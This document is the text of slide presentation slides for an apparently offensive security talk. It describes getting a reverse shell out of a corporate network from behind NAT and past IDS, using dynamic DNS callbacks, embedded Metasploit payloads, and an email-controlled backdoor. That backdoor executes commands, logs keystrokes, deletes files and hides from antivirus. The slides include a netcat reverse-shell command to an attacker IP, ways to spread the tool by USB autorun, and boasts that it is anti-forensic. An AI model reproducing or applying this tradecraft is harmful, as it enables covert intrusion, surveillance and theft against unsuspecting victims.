Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
1. Handle Explotion of Remote System
Without Being Online !!
By
Merchant Bhaumik
6. Who Am I ?
• Currently Helping local law-enforcement And Helping
In Securing Some Government Websites
• Developer Of IND 360 Intrusion Detection System
( Host Based As Well As Network Based Detection )
• Communicating with Metasploit Guys To Develop Term
Called “ Universal Payload”
9. Jack’s Situaion……….
Jack Working In A Company ...............!
In Which All Computers Behind The NAT
BOX……. ………………………!
And He Just Decided To Break One Of The
System Of His Office And Getting Shell From
Office To Home Computer
10. Problems For Jack….
•Company Has NIDS/IPS ( Network IDS ) …..
So No In Bound Connections………….
•He Don’t Know What IP Address Is
Allocated By His ISP
•He Can’t Use Any Mechanism Which
Constantly Sends Some OutBound Traffic
11. Good Thing For Jack….
• Jack’s Office Allow Him To Access His Gmail
Account..N Allow Some OutBound Traffic..
13. Why Reverse Shell ?
•Reverse Shell is one of the powerful method
for Bypassing Network Intrusion Detection
Systems , Firewalls ( Most Of The) etc
• Because Some of this network intrusion
only monitors In-bound connection … Not
the Out-bound ……
• Jack Has DMZ Network In His Office…..
14. Diagram 1
192.168.1.1
192.168.1.2
49.24.3.12 117.254.4.123 D
( INDIVIDUAL IP ) ( PUBLIC IP )
M 192.168.1.3
INTERNET
Z
192.168.1.4
192.168.1.5
15. Diagram 2 (Normal Attack ! )
192.168.1.1
192.168.1.2
49.24.3.12 117.254.4.123 D
( Attacker IP ) ( PUBLIC IP )
M 192.168.1.3
INTERNET
Z
192.168.1.4
Step I : Start Handler
on port 4343
nc –l –p 4343 Victim
Step II : nc 49.24.3.12 4343 –e cmd.exe
16. Normal Flow Of Getting Reverse
Shell
Exploit !
Attacker Starts Handler
Vuln. Injection N All that !
Victim Sends Reverse Shell
For Reverse Shell Scenario !
… To Attacker Machine !..
Attacker Wins !
17. But What’s Wrong With Jack?
He Don’t Know What IP Address Is
Allocated To His Computer
( Dynamic IP Allocation By ISPs)
19. My Way…….
Exploit !
Starting Handler On Local
Attacker Starts Handler
Machine Is Optional !
Vuln. Injection N All that !
Victim Sends Reverse Shell For Reverse Shell Scenario !
… To Attacker Machine !..
Attacker Wins !
20. Flow Of Execution……
Attacker !
Attack
Exe Running in
Victim Machine * If Attacker is not
online still the exe is
up and running in
Attacker No !! remote machine and
Update IP? if attacker updates
DNS records… The
Yes !! Reverse Shell Is On
The Attacker’s Desk !!
Attacker Receives
Reverse Shell
21. Mechanism
• If the Code ( First Part ) receives positive Acknowledgement of
sending packets …………
Jack Will Get Reverse Shell…………….
•Else keep running in the victim machine and waits for Ack.
From attacker’ machine…
22. Dynamic DNS Way…. (Initially ! )
• First Part : catchme.dyndns-ip.com ( 255.255.255.255 )
• Second Part : payload.dyndns-ip.com ( 255.255.255.255 )
NEW FINAL EXE CONSIST OF
First Part Synchronous
Execution
Second Part ( Single EXE )
New.exe
23. Dynamic DNS Way…. (Finally ! )
• First Part : catchme.dyndns-ip.com ( 127.0.0.1 )
• Second Part : payload.dyndns-ip.com (Attacker’s IP )
NEW FINAL EXE CONSIST OF
First Part Synchronous
Execution
Second Part ( Single EXE )
New.exe
24. Metasploit………….!!!!!
•You can embed my method (or My Exe ) with metasploit Payload which is of
your
choice .
* The Structure of new Exe will be as per follow :
NEW FINAL EXE CONSIS OF
My Tool Synchronous
Execution
MSF PAYLOAD ( Single EXE )
( LHOST = Dynamic )
New.exe
25. Hands On NetWork
192.168.1.1
192.168.1.2
49.24.3.12 117.254.4.123 D
( INDIVIDUAL IP ) ( PUBLIC IP )
M 192.168.1.3
INTERNET
Z
192.168.1.4
192.168.1.5
32. But, Who Is Zombie??
@ It may be one of the below :
It is one of like it…….
Or one like this…..
Or like this…….
33. Features !!
Execute Operating System Level Commands By Using Emails !
Get all Network Card Information with Allocated IP Addresses !
Live Tracking Of the System being used by victim !
Get All available account‟ List !
Enable/Disable Key Logger !
This All Stuff With Gmail , Yahoo , Hotmail………!!
34. About It !
It is a simple application which Once Up & Going on Victim‟
Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail
Email Services…
There is no need to be Online for Attacker to attack the Victim
System…..
Attacker Has to send attack instructions to Any of the mail
service & then it is like sitting on the door & watching the event ,
“ when it‟s gonna open !!”
As Victim Connects to the internet …. Attack Launches & the
results are automatically sent back to the Attacker‟s email
Address…..
35. Cool Benefits !!
If the email account is used by using One of like below then it is totally Anti-
Forensic ! No Reverse Detection Is Possible !
Create Unique password for all individual victims who are
infected …
Ability to handle multiple clients simultaneously …..
Delete Files In Victims Computer by Simply Sending An Email..
No Antivirus Can Detect Attack Because Of HTTPS ……
36. Tool Syntax …..
Password_For_Victim “: “Task_Commands”:”
E.g. Pwd$98$ : Account_info :
“Pwd$98$” is Password Command Which Sends back
For The Particular Email Containing Account Info In
Victim… Victim Computer !
37. Snap Shot 1…(Load Attack Instructions)
Password For Individual Victim
Send Account info Of Victim..
Send Drive Info Of Victim…
Sends Mac , Network card Info...
38. Snap Shot 2…(Get Back Attack Result)
Attached Info Of Victims Computer…!
As Per Of Attacker‟ Choice
My Emaill Account …… !
40. No Fear Of Detection 1
No Direct Connection Between Attacker & Victim
Attacker
Victim
41. No Fear Of Detection 2
No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It
Self…….!
42. How To Spread This Code??
Autorun.inf by USB Drives……….
Phisical Access Of Victim‟s System…..
During Metasploit Explotion ……
43. Further Possible Development !!
This Code Is Flexible Enough To Develop Further By My Hacker
Friends….It Is Also Possible For Future To Send Exploits Or
Trojans By Using This Code…….
Any One Can Send Exploits , Trojans , RootKits , BackDoors By
Simply Attaching It With Email And Sending It To His Own Account
Or Account That is Configured In Victim‟ Code………
44. Pros N Cons 1 ! ( Be Transparent !! )
Advantages are that the attacker never goin to caught if he/she
using the browser like TOR , Anononymizer , VPNs or Any
PROXy…. For accessing the attacking gmail account.
No Antivirus can detect the Instruction data because all traffic
gonna come from HTTPS …..!
Only single email account of gmail goin to use for both the side.
Attacker and victim machine both goin to connect same account
but attacker knows ,But Victim Don‟t !!
45. Pros N Cons 2
Disadvantage is that , if the victim has habit of checking the
current connections using commands like „netstat –n‟ then
possibility to detect Gmail connection when actually there is no
browser activity. But still it is difficult to detect ………. Because
process is running in Hidden mode….